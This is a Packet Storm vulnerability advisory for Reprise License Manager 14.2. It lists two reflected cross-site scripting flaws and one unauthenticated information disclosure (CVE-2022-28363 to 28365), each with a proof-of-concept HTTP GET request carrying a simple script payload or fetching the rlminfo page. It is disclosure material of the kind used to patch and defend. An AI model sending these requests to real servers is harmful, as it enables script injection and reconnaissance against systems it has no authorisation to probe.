exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Reprise License Manager 14.2 Cross Site Scripting / Information Disclosure

Reprise License Manager 14.2 Cross Site Scripting / Information Disclosure
Posted Apr 8, 2022
Authored by Giulia Melotti Garibaldi

Reprise License Manager version 14.2 suffers from cross site scripting and information disclosure vulnerabilities. The vendor has contacted Packet Storm to note that in v15.1 they have fixed this issue by now requiring login for the rlminfo route.

tags | exploit, vulnerability, xss, info disclosure
advisories | CVE-2022-28363, CVE-2022-28364, CVE-2022-28365
SHA-256 | 370fa6ba6f1124cf756ea20795a146d132468475c831aa36bf2f91715035bac6
Download | Favorite | View

Reprise License Manager 14.2 Cross Site Scripting / Information Disclosure

Change Mirror Download
Multiple Vulnerabilities in Reprise License Manager 14.2

Credit: Giulia Melotti Garibaldi

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# Product:  RLM 14.2
# Vendor:   Reprise Software
# CVE ID:   CVE-2022-28363
# Vulnerability Title: Reflected Cross-Site Scripting
# Severity: Medium
# Author(s): Giulia Melotti Garibaldi
# Date:     2022-03-29
#
#############################################################
Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.

Vulnerability PoC:

GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://HOST:5054
Connection: keep-alive
Referer: http://HOST:5054/goform/login_process





/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# Product:  RLM 14.2
# Vendor:   Reprise Software
# CVE ID:   CVE-2022-28364
# Vulnerability Title: Authenticated Reflected Cross-Site Scripting
# Severity: Low
# Author(s): Giulia Melotti Garibaldi
# Date:     2022-03-29
#
#############################################################
Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.

Vulnerability PoC:

GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://HOST:5054
Connection: keep-alive
Referer: http://HOST:5054/goforms/rlmswitchr
Cookie: REDACTED




/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# Product:  RLM 14.2
# Vendor:   Reprise Software
# CVE ID:   CVE-2022-28365
# Vulnerability Title: Unauthenticated Information Disclosure
# Severity: Low
# Author(s): Giulia Melotti Garibaldi
# Date:     2022-03-29
#
#############################################################
Introduction:
Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.
The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.

Vulnerability PoC:

GET http://HOST:5054/goforms/rlminfo HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Content-Length: 0



//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close